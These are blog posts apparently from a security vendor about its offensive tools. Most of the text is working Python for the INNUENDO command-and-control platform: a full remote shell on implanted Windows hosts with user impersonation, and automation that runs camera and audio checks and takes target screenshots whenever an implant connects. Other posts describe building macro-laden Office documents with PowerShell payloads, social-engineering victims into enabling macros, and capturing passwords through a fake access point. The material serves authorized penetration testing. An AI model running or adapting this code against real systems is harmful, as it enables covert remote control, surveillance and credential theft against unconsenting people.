Wednesday, December 14, 2016

INNUENDO RPC: shell

This is the third installment of this series. Here are links for the first and second. For this post we're going to take a look at the implementation of a command shell using INNUENDO's RPC API.

Essentially, what this script does is:

Accepts a command from the user on the terminal.
Queues a filemanager/execute operation in the INNUENDO C2, using the RPC API.
Waits for the operation to complete, and dumps the output to the terminal.

Since the script depends on the execute operation, it is able to take full advantage of capabilities such as user impersonation, allowing you to run the shell as any user on the target system.
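The three steps above can be sketched roughly as follows. The stand-in FakeClient and its canned results are illustrative assumptions made for this sketch; the real script makes these calls against INNUENDO's rpc.Client.

```python
class FakeClient(object):
    """Stand-in for rpc.Client; returns canned results for the sketch."""
    def operation_execute(self, module, name, proc_id, args=None):
        return ['oper-1']                       # queue the operation, get its ID
    def operation_wait(self, oper_id):
        return [{'success': True}]              # block until the implant syncs
    def operation_attributes(self, oper_id):
        return {'stdout': 'nt authority\\system', 'stderr': ''}

def run_command(client, proc_id, command):
    # 1. queue a filemanager/execute operation for the target implant
    oper_id = client.operation_execute(
        'filemanager', 'execute', proc_id,
        args={'path': command, 'shell': True, 'output_capture': True})[0]
    # 2. wait for the operation to complete
    client.operation_wait(oper_id)
    # 3. dump the collected output
    attrs = client.operation_attributes(oper_id)
    return attrs['stdout'] + attrs['stderr']

print(run_command(FakeClient(), 'de1014f777018dffd21678d2e7a3f5c0', 'whoami'))
```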

Remember as well that thanks to the design of INNUENDO's channels, this shell is resilient to any sort of communication failure. If the web channel were to go down just after entering a command, you would still get the command's output as soon as the implant is able to sync again (maybe over the DNS channel).

Also note that the response time of a command will depend on the active channel of the target implant, and the configured sync_frequency for that channel. So while a command shell is an interesting experiment in how the RPC API can be used, it won't be practical unless the sync interval is very short (or your patience is very high).

Here is a video demonstrating the functionality of this script:



Shell


The script accepts a few command-line arguments.

usage: shell.py [-h] [-c COMMAND] [--no-cache] [--token-user TOKEN_USER]
                [--token-luid TOKEN_LUID] [-p PROMPT] [-u URL]
                process_implant_id

Command-line interface to an INNUENDO implant target shell.

NOTE: The "process_implant_id" argument refers to the hash ID listed for an
implant in the process_list. Not to be confused with the PID.

    $ ./rpc.py process_list
    Machine: <machine_id>
      Node: <node_id>
        <process_implant_id> | synced | ...

positional arguments:
  process_implant_id    the ID of the implant process to target

optional arguments:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        execute a command then exit
  --no-cache            do not use cached data for initialization
  --token-user TOKEN_USER
                        attempt impersonation of a "[domain\]user"
  --token-luid TOKEN_LUID
                        sets a token LUID for impersonation
  -p PROMPT, --prompt PROMPT
                        a windows prompt format string
  -u URL, --url URL     rpc server url

The only thing that is required to use the shell script is a target implant, which we can easily get using the RPC command-line script's process_list command.

$ ./rpc.py process_list 
Machine: 96e41afa2cfbe7b26d3b5c397abb2b8f5198bdb3
 Node: c8aaddbc059b40f4a3f7d61945cb2684
  b850bef0abe4417debc273c640be7e58 | synced | 2016-12-14 13:31:47 | boot64.exe (1572)
 Node: nt authority\system
  de1014f777018dffd21678d2e7a3f5c0 | synced | 2016-12-14 13:31:50 | netclassmon.exe (1864)

Note that the process_implant_id is not the PID. It's the hash before the sync status. Once we have one, we can pass it to the shell script.

$ python -m examples.rpc.shell de1014f777018dffd21678d2e7a3f5c0
initializing ...
Microsoft Windows [Version 6.1.7601]

C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> exit

We can even use impersonation to run our shell as a different user.

$ python -m examples.rpc.shell de1014f777018dffd21678d2e7a3f5c0 --token-user immunity
initializing ...
Microsoft Windows [Version 6.1.7601]

C:\Windows\system32> whoami
bunny\immunity

Notice how the shell behaves as you would expect it to when running as the "immunity" user.

C:\Windows\system32> cd c:\users\administrator
Access is denied.
C:\Windows\system32> cd c:\users\immunity
c:\Users\immunity> dir
 Volume in drive C has no label.
 Volume Serial Number is 883B-C53C

 Directory of c:\Users\immunity

12/19/2013  05:11 PM    <DIR>          .
12/19/2013  05:11 PM    <DIR>          ..
12/19/2013  05:11 PM    <DIR>          Contacts
07/13/2016  10:46 AM    <DIR>          Desktop
12/19/2013  05:11 PM    <DIR>          Documents
12/20/2013  12:14 PM    <DIR>          Downloads
12/19/2013  05:11 PM    <DIR>          Favorites
12/19/2013  05:11 PM    <DIR>          Links
12/19/2013  05:11 PM    <DIR>          Music
12/19/2013  05:11 PM    <DIR>          Pictures
12/19/2013  05:11 PM    <DIR>          Saved Games
12/19/2013  05:11 PM    <DIR>          Searches
12/19/2013  05:11 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  54,171,832,320 bytes free
c:\Users\immunity>

Source


The full source is at the bottom of the post, but let's step through some of the more interesting bits.

To start, we import the modules that we need and set some global variables. We import the readline module when it's available to give us command history for free.

try:
    import readline
except ImportError:
    pass

We also set some tag names which this script will use to locate specific operation results.

PROMPT = '$p$g$s'
TAG_ENV = 'shell:environment'
TAG_META = 'shell:metadata'

Next, we have our main class. client is the INNUENDO RPC client. proc_id is the ID of the target implant. The other variables track the current state of the shell.

    def repl(self):
        """The Read-Eval-Print Loop."""

        while True:
            prompt = self.parse_prompt()
            oper_id = None
            try:
                line = raw_input(prompt).strip()

                oper_id = self.execute(line, wait=wait)

The setup method queues some operations to pull environment variables and other metadata from the target. First, though, it checks to see if operations that have the required information have already been executed by searching for specific tags.

Checking for an existing operation:

            search = ' '.join([TAG_ENV, token_tag, self.proc_id])
            res = c.operation_list(search=search, limit=1)
            if res['records']:
                oper = res['records'][0]
                self.check_error(oper)
                self.env = c.operation_attributes(oper['id'])['env']

Executing and tagging an operation, if there is no existing operation:

            oper_id = c.operation_execute('recon', 'environment', self.proc_id)[0]
            self.check_error(c.operation_wait(oper_id)[0])

            self.env = c.operation_attributes(oper_id)['env']

            c.operation_tag_add(TAG_ENV, oper_id)
            c.operation_tag_add(token_tag, oper_id)

The execute method simply wraps the entered command so that it is executed in the correct directory.

            command = 'cd /D %s && %s' % (self.cwd, command)

It also tags the operation with the command name to make it easy to find the results for certain commands, and to provide context when looking at a list of execute operations.

        tag = ':'.join(['cmd', command.split(None, 1)[0]])

        res = c.operation_execute('filemanager', 'execute', self.proc_id, args=args)
        c.operation_tag_add(tag, res[0])
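
Put together, the wrapping and tagging amount to two small string transformations, sketched here as standalone functions (the names command_tag and wrap_command are hypothetical, not part of the script):

```python
def command_tag(command):
    # tag with the first word of the command, e.g. 'dir /w' -> 'cmd:dir'
    return ':'.join(['cmd', command.split(None, 1)[0]])

def wrap_command(cwd, command):
    # prefix a drive-aware cd so the command runs in the shell's tracked cwd
    return 'cd /D %s && %s' % (cwd, command)

print(command_tag('dir /w'))                        # cmd:dir
print(wrap_command('c:\\Users\\immunity', 'dir'))   # cd /D c:\Users\immunity && dir
```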

The remaining methods are helpers.

wait waits for an operation to complete. It also contains the logic for handling "CTRL+C", and terminating any processes that were started by a command.

output collects the stdout and stderr from a command and formats them for output to the terminal.

check_error checks the result of the operation and exits the script if there was an unexpected failure.

kill wraps a call to the manager/terminate operation.

chdir checks if the requested directory exists on the target and stores the path locally. The "current directory" is attached to every command so that it is executed in the correct context.

parse_prompt parses the PROMPT environment variable and does its best to fill in the appropriate values. You get the same prompt the target system's user has set!
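
As a rough illustration of that substitution, here is a cut-down version supporting only a handful of the cmd.exe $-codes (render_prompt is a hypothetical helper for this sketch, not the script's parse_prompt):

```python
import re

rx_prompt = re.compile(r'[$](.)')

def render_prompt(prompt, cwd):
    # substitute a subset of the cmd.exe $-codes:
    # $p (current path), $g (>), $s (space), $$ (literal $)
    codes = {'p': cwd, 'g': '>', 's': ' ', '$': '$'}
    return ''.join(codes.get(m.group(1).lower(), '')
                   for m in rx_prompt.finditer(prompt))

print(render_prompt('$p$g$s', 'C:\\Windows\\system32'))
```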

Finally, we have the code that sets up the command-line arguments, connects to INNUENDO with the RPC client, and starts the REPL.

Here is the full source:

#! /usr/bin/env python

"""
Command-line interface to an INNUENDO implant target shell.
"""

import re
import sys
import ntpath
try:
    import readline
except ImportError:
    pass

import rpc

PROMPT = '$p$g$s'
TAG_ENV = 'shell:environment'
TAG_META = 'shell:metadata'

rx_prompt = re.compile(r'[$](.)')

class Shell(object):
    def __init__(self, client, proc_id, token_user=None, token_luid=None, prompt=None):
        self.client = client
        self.proc_id = proc_id
        self.env = None
        self.ver = None
        self.cwd = None
        self.token_user = token_user
        self.token_luid = token_luid
        self.prompt = prompt

    def repl(self):
        """The Read-Eval-Print Loop."""
        c = self.client

        print self.ver
        print

        while True:
            prompt = self.parse_prompt()
            oper_id = None
            try:
                line = raw_input(prompt).strip()
                if not line:
                    continue
                if line.lower() == 'exit':
                    break
                if line.lower().startswith('cd'):
                    try:
                        path = line.split(' ', 1)[1].strip()
                    except IndexError:
                        pass
                    else:
                        self.chdir(path)
                        continue
                wait = line[-1] != '&'

                oper_id = self.execute(line, wait=wait)
                if wait:
                    self.wait(oper_id)
                    print self.output(oper_id)

            except EOFError:
                break
            except KeyboardInterrupt:
                print
                continue

    def setup(self, cached=True):
        """Collect metadata used to format the shell.

        Uses existing operations when *cached* is `True`.
        """
        c = self.client

        # if the luid is set, it takes precedence
        token_tag = ':'.join(['token', self.token_luid or self.token_user or 'none'])

        if cached:
            # check past ops
            search = ' '.join([TAG_META, token_tag, self.proc_id])
            res = c.operation_list(search=search, limit=1)
            if res['records']:
                oper = res['records'][0]
                self.check_error(oper)
                self.ver, self.cwd = self.output(oper['id']).strip().splitlines()

            search = ' '.join([TAG_ENV, token_tag, self.proc_id])
            res = c.operation_list(search=search, limit=1)
            if res['records']:
                oper = res['records'][0]
                self.check_error(oper)
                self.env = c.operation_attributes(oper['id'])['env']

        if not self.cwd:
            oper_id = self.execute('ver && cd')
            self.check_error(self.wait(oper_id))

            self.ver, self.cwd = self.output(oper_id).strip().splitlines()

            c.operation_tag_add(TAG_META, oper_id)
            c.operation_tag_add(token_tag, oper_id)

        if not self.env:
            oper_id = c.operation_execute('recon', 'environment', self.proc_id)[0]
            self.check_error(c.operation_wait(oper_id)[0])

            self.env = c.operation_attributes(oper_id)['env']

            c.operation_tag_add(TAG_ENV, oper_id)
            c.operation_tag_add(token_tag, oper_id)

    def execute(self, command, wait=True):
        """Executes a command on the targets and returns the operation ID."""
        c = self.client

        tag = ':'.join(['cmd', command.split(None, 1)[0]])
        if self.cwd:
            command = 'cd /D %s && %s' % (self.cwd, command)
        args = {
            'path': command,
            'shell': True,
            'output_capture': True,
            }
        if not wait:
            args['output_capture'] = False
            args['wait'] = False
        if self.token_user:
            args['token_domain_user'] = self.token_user
        if self.token_luid:
            args['token_luid'] = self.token_luid

        res = c.operation_execute('filemanager', 'execute', self.proc_id, args=args)
        c.operation_tag_add(tag, res[0])
        return res[0]

    def wait(self, oper_id):
        """Waits for *oper_id* to complete and returns the operation.

        If a `KeyboardInterrupt` is caught while waiting for the operation,
        the operation will be cancelled, and any processes it started will be
        killed.
        """
        c = self.client

        try:
            return c.operation_wait(oper_id)[0]
        except KeyboardInterrupt:
            res = c.operation_attributes(oper_id)
            if res['process_id']:
                print 'killing tree: %(process_id)s' % res
                self.kill(res['process_id'])
            c.operation_cancel(oper_id)
            print
            raise

    def output(self, oper_id):
        """Returns a string containing the stdout and stderr of *oper_id*."""
        c = self.client

        out = []
        attrs = c.operation_attributes(oper_id)

        stdout = attrs['stdout']
        stderr = attrs['stderr']
        if stdout:
            out.append(stdout.rstrip())
        if stderr:
            out.append(stderr.rstrip())

        return '\n'.join(out)

    def check_error(self, oper):
        """Exits the program if *oper* contains an error."""
        if not oper['success']:
            sys.exit('\n'.join([oper['error'], oper['exception']]))

    def kill(self, pid, recurse=True):
        """Kills the process with *pid* on the target."""
        c = self.client
        return c.operation_execute('manager', 'terminate', self.proc_id, args={
            'process_id': pid, 'recurse': recurse,
            })

    def chdir(self, path):
        """Changes the current working directory.

        The target is first checked to verify that *path* is valid.
        """
        c = self.client

        oper_id = self.execute('cd /D %s && cd' % path)
        attrs = c.operation_attributes(oper_id)
        output = self.output(oper_id)

        # set the new cwd if the command succeeded
        if attrs['return_code'] == 0:
            self.cwd = output
        else:
            print output

    def parse_prompt(self):
        """Returns a Windows prompt with codes subtituted with their respective
        values.

        Not supported: $+, $M
        """
        prompt = self.env.get('PROMPT', PROMPT) if self.prompt is None else self.prompt
        result = []
        for match in rx_prompt.finditer(prompt):
            code = match.group(1).lower()
            result.append({
                'a': '&',
                'b': '|',
                'c': '(',
                'd': '<current date>', # TODO
                'e': '\x1b', # escape character (ASCII 27)
                'f': ')',
                'g': '>',
                'h': '\b',
                'l': '<',
                'n': ntpath.splitdrive(self.cwd)[0],
                'p': self.cwd,
                'q': '=',
                's': ' ',
                't': '<current time>', # TODO
                'v': self.ver,
                '_': '\n',
                '$': '$',
                }.get(code, ''))
        return ''.join(result)

def main():
    import argparse

    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument('process_implant_id')
    parser.add_argument('-c', '--command', help='execute a command then exit')
    parser.add_argument('--no-cache', action='store_false', dest='cached',
        help='do not use cached data for initialization')
    parser.add_argument('--token-user', help='attempt impersonation of a "[domain\]user"')
    parser.add_argument('--token-luid', help='sets a token LUID for impersonation')
    parser.add_argument('-p', '--prompt', help='a windows prompt format string')
    parser.add_argument('-u', '--url', help='rpc server url')

    args = parser.parse_args()
    proc_id = args.process_implant_id

    c = rpc.Client(args.url)

    try:
        c.process_get(proc_id)
    except rpc.RemoteError:
        sys.exit('invalid target process')

    if args.command:
        shell = Shell(c, proc_id, args.token_user, args.token_luid)
        oper_id = shell.execute(args.command)
        shell.check_error(shell.wait(oper_id))
        print shell.output(oper_id)
        return

    print 'initializing ...'
    shell = Shell(c, proc_id, args.token_user, args.token_luid, args.prompt)
    shell.setup(cached=args.cached)

    # Enter REPL
    shell.repl()

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        pass

Friday, September 9, 2016

Leveraging INNUENDO's RPC for Fun and Profit: tagging

For the second installment of this series (see the previous here), we're going to take a look at the new tagging functionality that was added to INNUENDO 1.6.

It is now possible to tag both operations and processes, making it much more convenient to organize each in a wide variety of ways. All of this can be done from the INNUENDO Web UI, and you can see a demonstration of that in this video.

This post will demonstrate how you can use RPC to automatically add and remove tags based on the results of operations.

The first step is to set up an event stream, just as we did in the previous post.

>>> import pprint # to make it easier to look through results
>>> import rpc
>>> c = rpc.Client()
>>> for event in c.events():
...     pprint.pprint(event)
None
{'data': {'id': '...'},
 'name': 'machine_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 890128)}
{'data': {'id': '...'},
 'name': 'node_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 927102)}
{'data': {'id': '...'},
 'name': 'process_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 957477)}

This is a typical example of the output from an event stream. Note that it will occasionally return None, which we can safely ignore. For our purposes, the events we are interested in are operation_updated and process_added.
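
A minimal sketch of consuming such a stream, skipping the None keep-alives and filtering down to the events we care about (interesting is a hypothetical helper; the Monitor class below does the same job with a getattr-based dispatch, and the fake stream here is just canned data):

```python
def interesting(events, wanted=('operation_updated', 'process_added')):
    # drop the occasional None entries and any event types we don't handle
    for event in events:
        if not event:
            continue
        if event['name'] in wanted:
            yield event

# a canned stand-in for c.events()
stream = [None, {'name': 'machine_updated'}, {'name': 'process_added'}, None]
print([e['name'] for e in interesting(stream)])   # ['process_added']
```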

We can loop through the events and process them individually in a tree of if statements as in the previous post, but let's add a layer of abstraction to make life a bit easier.

import rpc

class Monitor(rpc.Client):
    def on_some_event(self, event):
        """Called when "some_event" is emitted."""
        pass


    def monitor(self):
        """Monitors events for any existing event handlers."""
        # create an event filter based on the existing handlers
        filter = [n[3:] for n in dir(self) if n.startswith('on_')]
        print 'monitoring: {}'.format(', '.join(filter))

        for event in self.events(*filter):
            if not event: continue
            handler = getattr(self, 'on_' + event['name'])
            handler(event)

This small subclass lets us define a method for each event we care about; the monitor loop builds its event filter from those methods and dispatches to them automatically. Now we can build off of that to begin processing events.

Let's add a handler to queue some operations every time a new process is added.

class Monitor(rpc.Client):
    # ... previous code ...
    def on_process_added(self, event):
        # all process events set event['data']['id'] to the relevant
        # process ID 
        proc_id = event['data']['id']
    
        # queue some recon operations
        self.operation_execute('recon', 'assign_aliases', proc_id)
        self.operation_execute('recon', 'audio_query', proc_id)
        self.operation_execute('recon', 'camera_query', proc_id)

That's all it takes. Those operations will be queued for execution with every new process that activates with the C2. This is nice, but it would be even better if we could process the results of those operations somehow.

One way to do that is to wait for the results to come in using
Client.operation_wait or Client.operation_call. However, by taking advantage of the event stream, we can process the results of every operation that is queued (even if queued in the Web UI), not just the ones we queue ourselves in the on_process_added handler.

So, let's add another handler to process operation results. We'll use the same dispatch pattern as the monitor method, so the results of different operations can be processed simply by adding handler methods.

class Monitor(rpc.Client):
    # ... previous code ...
    def on_operation_updated(self, event):
        # all operation events set event['data']['id'] to the relevant
        # operation ID
        oper_id = event['data']['id']
        # using the operation ID, we can retrieve the operation metadata
        oper = self.operation_get(oper_id)

        # and we can use the metadata to filter out operations that we're not
        # interested in. In this case, operations that are not finished
        if oper['state'] != 'finished':
            return

        # get operation attributes (these are the results)
        attrs = self.operation_attributes(oper['id'])

        # handle operation (if a matching 'handle_' method exists)
        handler = getattr(self, 'handle_' + oper['name'], None)
        if handler:
            # pass in both the operation metadata and attributes
            handler(oper, attrs)

Here, we're using a different method prefix (handle_) to define the methods that will handle operation results. Now we just have to add handlers for the operations we're interested in.

class Monitor(rpc.Client):
    # ... previous code ...
    def handle_assign_aliases(self, oper, attrs):
        # assign_aliases offers us a quick way to determine the target's
        # architecture, among other useful bits of info
        arch = attrs['info']['arch']

        # let's tag it!
        self.process_tag_add('arch:{}'.format(arch), oper['process_id'])

    def handle_camera_query(self, oper, attrs):
        if attrs['cameras']:
            self.process_tag_add('has:camera', oper['process_id'])
        else:
            # a camera could be removed, so we should be able to update
            # the tag in that case
            self.process_tag_remove('has:camera', oper['process_id'])

    def handle_audio_query(self, oper, attrs):
        if attrs['devices']:
            self.process_tag_add('has:audio', oper['process_id'])
        else:
            # audio could be removed, so we should be able to update
            # the tag in that case
            self.process_tag_remove('has:audio', oper['process_id'])

How you tag your processes or operations is up to you, of course. We recommend a naming scheme that includes uniquely identifiable elements so the tags can be used to search for processes/operations.
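
For example, a namespaced scheme like 'arch:x64' or 'has:camera' can be built and searched with a couple of trivial helpers (make_tag and match_tags are hypothetical names, not part of the RPC API):

```python
def make_tag(namespace, value):
    # namespaced tags ('arch:x64', 'has:camera') stay unique and searchable
    return '{}:{}'.format(namespace, value)

def match_tags(tags, namespace):
    # filter a process's tags down to the values in one namespace
    prefix = namespace + ':'
    return [t[len(prefix):] for t in tags if t.startswith(prefix)]

tags = ['arch:x64', 'has:camera', 'has:audio']
print(match_tags(tags, 'has'))   # ['camera', 'audio']
```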

Any added/removed tag will be reflected immediately in the Web UI.

Here is the full code.

import rpc

class Monitor(rpc.Client):
    ## operation result handlers ##

    def handle_assign_aliases(self, oper, attrs):
        arch = attrs['info']['arch']
        self.process_tag_add('arch:{}'.format(arch), oper['process_id'])

    def handle_camera_query(self, oper, attrs):
        if attrs['cameras']:
            self.process_tag_add('has:camera', oper['process_id'])
        else:
            self.process_tag_remove('has:camera', oper['process_id'])

    def handle_audio_query(self, oper, attrs):
        if attrs['devices']:
            self.process_tag_add('has:audio', oper['process_id'])
        else:
            self.process_tag_remove('has:audio', oper['process_id'])

    ## event handlers ##

    def on_process_added(self, event):
        proc_id = event['data']['id']
    
        # queue some recon operations
        self.operation_execute('recon', 'assign_aliases', proc_id)
        self.operation_execute('recon', 'audio_query', proc_id)
        self.operation_execute('recon', 'camera_query', proc_id)
    
    def on_operation_updated(self, event):
        oper_id = event['data']['id']
        oper = self.operation_get(oper_id)

        # filter
        if oper['state'] != 'finished':
            return

        # get operation attributes
        attrs = self.operation_attributes(oper['id'])

        # handle operation
        handler = getattr(self, 'handle_' + oper['name'], None)
        if handler:
            print 'handling operation:', oper['name']
            handler(oper, attrs)

    ## monitor ##

    def monitor(self):
        """Monitors events for any existing event handlers."""
        # create an event filter based on the existing handlers
        filter = [n[3:] for n in dir(self) if n.startswith('on_')]
        print 'monitoring: {}'.format(', '.join(filter))

        for event in self.events(*filter):
            if not event: continue
            print 'handling event:', event['name']
            handler = getattr(self, 'on_' + event['name'])
            handler(event)

if __name__ == '__main__':
    try:
        Monitor().monitor()
    except KeyboardInterrupt:
        pass

You can watch this script in action in the video mentioned at the top of this post.

Thursday, June 23, 2016

Wireless Penetration Testing: So easy anyone can do it!

My name is Lea Lewandowski and I am the newest member of the admin team at Immunity. I have a Bachelor of Science in Business Administration with a major in Marketing and a minor in Sociology and yes, even I can use SILICA. Prior to joining Immunity four weeks ago, I earned a living working at Starbucks for a year and a half, because like most college graduates, I did not have a full time career to jump right into. Then Immunity came along and decided to give me a shot at this thing called "real life work".  I can honestly say that I was not expecting to learn 'how to hack' during my second week at the company.

When I first heard that I was going to try to learn how to use SILICA I was pretty intimidated. Here I am, with no previous experience in computers or technology and I'm told to sit in front of this computer and get some passwords. Little did I know, this stuff is all automated. All I have to do is click some buttons. I swear, it is really that easy.  SILICA does all of the hard work for you, which makes the wireless penetration testing simple even for the non-techies of the world (like me!).

Ironically, my first SILICA lesson was at a Starbucks. We were there for less than half an hour and I was able to steal my own password from myself using the Fake AP (stands for Access Point, btw) feature. I also learned that I needed to fix the security settings on my iPhone. All I had to do was some clicky-clicky and then wait and, lo and behold, I got my password (which I have now changed).

Another feature that I learned how to use in a few minutes was the AP mapping tool. I was able to figure out how to use the AP mapping feature in the office and in my apartment. With this tool, I was able to find the exact location of APs in both places. Pretty interesting stuff. Below is a picture of the AP mapping feature finding an AP in my apartment.
I didn't realize that I had to blur this out so you stalkers couldn't find my house! Learn something new every day.
I created a map image of my apartment, imported it into the location capture tab, and walked around clicking different areas of the map. The outcome was a heat map of APs around me. I found the AP in my apartment using the heat map, right-clicked the AP for the signal strength, and found exactly where the AP was located. The above image shows the signal strength at its highest because the SILICA was sitting right on top of the AP.

I'd love to sit here and tell you that I figured this all out because I'm some type of genius and a super-fast learner, but that isn't the case. My experiences with SILICA, combined with my complete lack of technical knowledge, are proof that anyone can learn how to use it. It has definitely been an eye-opening introduction to the security world.

Monday, May 23, 2016

The old Office Binder is back for more client-side funsies!



MS Office documents for targeted attacks: Re-Introducing CANVAS's Binderx module.

In targeted attacks, one of the most effective methods of compromising a remote computer is to send the victim a malicious Microsoft Office document with an auto-executing VBA Macro. However, MS Office Macros are not enabled by default, and when a Macro-Embedded document is opened it will present a security warning stating that macros have been disabled and offering to “enable content”. To achieve successful exploitation, the attacker must persuade the victim to click the button that allows the embedded Macro to run and compromise the system. We will analyze some of the security warnings in the different MS Office versions.

VBA Macros and Ms Office's file formats

VBA Code or VBA Macros can be included in “legacy” binary formats such as .xls, .doc and .ppt,
and in modern XML-formatted documents like the Office Open XML file format (OOXML format) supported by MS Office 2007 and later. Documents, templates, worksheets, and presentations created in MS Office 2007 and later are saved with different file-name extensions ending in an “x” or an “m”.
For example, when you save a document in MS Word, the file now uses the .docx extension instead of the .doc extension. To save a Macro-Embedded document you must save it as a “Macro-Enabled Document”, and the file-name extension will be .docm (or .xlsm, .pptm, etc.).
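
As a quick sketch of the extension rules above, a filename check for formats that may carry VBA (can_carry_macros is a hypothetical helper; the extension sets follow the formats described in the text):

```python
import os.path

# macro-enabled OOXML extensions, plus the legacy binary formats,
# which can always embed VBA
MACRO_OOXML = {'.docm', '.xlsm', '.pptm'}
LEGACY = {'.doc', '.xls', '.ppt'}

def can_carry_macros(filename):
    ext = os.path.splitext(filename)[1].lower()
    return ext in MACRO_OOXML or ext in LEGACY

print(can_carry_macros('report.docm'))   # True
print(can_carry_macros('report.docx'))   # False
```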

Illustration 1: Word Macro-Enabled documents in legacy format and OOXML format


Security Warnings in MS Office releases

VBA Macros are not enabled by default in any MS Office version, so the victim will see different warning messages depending on the release.


MS Office 2007





MS Office 2010




MS Office 2016





In summary, the following table describes all messages produced when a Macro-Embedded file is opened. (Tested with legacy files and OOXML format files as well)



                        2007   2010   2013   2016
Security Warning        Yes    Yes    Yes    Yes
Security Alert Window   Yes    No     No     No


As we can see in the table above, MS Office 2010 and higher versions show no Security Alert Window. Of course, as mentioned before, successful exploitation relies on your social engineering skills to induce the victim to enable macro execution.

Introducing Binderx module

CANVAS's Binderx module allows you to create an MS Office blank document with an embedded payload that will be executed using a VBA Macro.

Two types of document files can be created with the module: MS Word or MS Excel (using “legacy” format or OOXML format).

It is worth mentioning that MS PowerPoint does not include auto-execution Macro support like that available in MS Word and MS Excel.

Additionally, we added support for both Windows MOSDEF shellcode and PowerShell payloads.

Creating a legacy MS Word document with a PowerShell payload
Everyone loves a good shell!


Enjoy! As always, we appreciate any feedback from your experiences with these features during your penetration tests!

AnĂ­bal Irrera.

Wednesday, February 24, 2016

Leveraging INNUENDO's RPC for Fun and Profit: screengrab

INNUENDO 1.5 is on its way, and along with a host of other great features, we've refined the RPC interface.

In this post I want to demonstrate how one can begin layering high-level automation on top of INNUENDO C2 operations using the RPC interface.

Let's start simple. All we want is a screenshot of the target machine every time a new implant process connects to the C2.

The first thing we need is access to the RPC client library. The RPC client can be found in the INNUENDO directory as "<innuendo>/innuendo_client.py". This file actually bundles all of the client dependencies within it, so the only requirement to use it is a Python (2.7) installation.

Once you've copied the client file to your local machine, you simply have to point it at the address and port of the C2 RPC server (and ensure that host/port is accessible, of course).

$ ./innuendo_client.py -u tcp://<c2-host>:9998 ping
ping?
pong!
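If the ping hangs rather than answering, it's worth checking basic TCP reachability before digging into the client itself. A minimal sketch using only the standard library; the host and port below are placeholders for your own C2 address:

```python
import socket

def c2_reachable(host, port, timeout=3.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        sock = socket.create_connection((host, port), timeout)
    except (socket.error, OSError):
        return False
    sock.close()
    return True

# Placeholder values; substitute your C2 host and RPC port.
print(c2_reachable('127.0.0.1', 9998))
```

This only proves the port is open, of course; a successful ping through the client is still the real test.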

You'll notice that you have full access to the command-line interface using this file, but we can get quite a bit more flexibility if we import it into Python.

>>> import innuendo_client

This first import bootstraps the environment, and gives us access to the RPC client and its dependencies. Now, we can import the client library:

>>> from innuendo import rpc

Now, let's connect to the RPC server.

>>> c = rpc.Client('tcp://<c2-host>:9998')
>>> c.module_names()
('exploitmanager', 'recon', ...)

Excelsior! Let's watch some implants sync:

>>> for event in c.events('process'):
...     proc_id = event['data']['id']
...     proc = c.process_get(proc_id)
...     print proc['name'], proc['machine_alias']
netclassmon.exe Windows-7-x64-fuzzybunny
boot64.exe Windows-7-x64-wombat
rundll32.exe Windows-XP-x86-cabbage
boot64.exe Windows-7-x64-fuzzybunny
boot32.exe Windows-XP-x86-cabbage

NOTE: Here we are filtering for process events. If we wanted to grab all node events and any new machine events, we could call Client.events() like this instead: c.events('node', 'machine_added').

By reacting to this event stream, we can now begin to build a layer of automated decision-making on top of INNUENDO. A simple, but very useful option is to execute an operation or group of operations as soon as a new implant first syncs to the C2. Here's an example that takes a screenshot of the target as soon as an implant activates.

>>> for event in c.events('process_added'):
...     proc_id = event['data']['id']
...     c.operation_execute([proc_id], 'screengrab')

This snippet will queue a "recon.screengrab" operation on the C2 for every process that is added while the script is running. The GIF below shows us how it would look in INNUENDO's UI.
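As the number of event types you react to grows, a small dispatch table keeps the loop readable. Here's a sketch of that pattern; `fake_events` is a hypothetical stand-in for `Client.events()` (yielding the same `{'name': ..., 'data': ...}` dictionaries) so the snippet runs on its own:

```python
def fake_events():
    # Hypothetical stand-in for Client.events(); yields the same
    # {'name': ..., 'data': ...} dictionaries the C2 streams out.
    yield {'name': 'process_added', 'data': {'id': 'abc123'}}
    yield None  # heartbeat
    yield {'name': 'operation_updated', 'data': {'id': 'oper42'}}

queued = []

def on_process_added(data):
    # In the real script: c.operation_execute([data['id']], 'screengrab')
    queued.append(data['id'])

def on_operation_updated(data):
    print('operation %s changed state' % data['id'])

# map each event name to its handler
handlers = {
    'process_added': on_process_added,
    'operation_updated': on_operation_updated,
}

for event in fake_events():
    if not event:
        continue  # ignore heartbeats
    handler = handlers.get(event['name'])
    if handler:
        handler(event['data'])

print(queued)
```

Swapping `fake_events()` for a real `c.events('process_added', 'operation_updated')` call gives you the same structure against a live C2.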



Let's take it a bit further and dump thumbnails of the screenshots into a local directory. The full source for catching the right events is below, but first let's just take a step-by-step look at grabbing operation results.

>>> import msgpack
>>> res = c.operation_attributes(oper_id)
>>> attrs = msgpack.unpackb(res)

Since operation attributes can potentially store large binary data, the RPC layer does not automatically deserialize them for you, so we do that with msgpack.

NOTE: msgpack is a serialization library. A pure-Python version is bundled with the client library, but if you need higher performance, you'll want to grab the full package off of PyPI, which includes a C implementation. The client will prefer an installed copy over the bundled copy.

>>> remote_path = attrs['data'][0]['path']

This gives us the path of the screenshot image file on the C2 server. Index 0 is the first of potentially several images that could have been grabbed. Now we just have to ask the C2 for the file and save it locally.

>>> import os
>>> local_path = os.path.basename(remote_path)
>>> with open(local_path, 'w+b') as file:
...     for chunk in c.file_download(remote_path):
...         file.write(chunk)

This will stream the screenshot chunk-by-chunk to a file in the current directory. Let's put it all together!

import os

# bootstrap the client environment
import innuendo_client

import msgpack
from innuendo import rpc

def main():
    print 'waiting'
    
    c = rpc.Client()
    
    # track the operations we want to watch
    oper_ids = set()
    
    for event in c.events('process_added', 'operation_updated'):
        if not event:
            # the server will send out "heartbeat" events periodically
            # we can ignore them
            continue
        
        elif event['name'] == 'process_added':
            print 'process_added: taking screenshot'
            
            # grab the ID of the process that just activated
            proc_id = event['data']['id']
            
            # queue a screengrab operation and track its ID
            res = c.operation_execute([proc_id], 'screengrab', wait=True)
            oper_ids.add(res[0])
            
            print 'operation_added:', res[0]
        
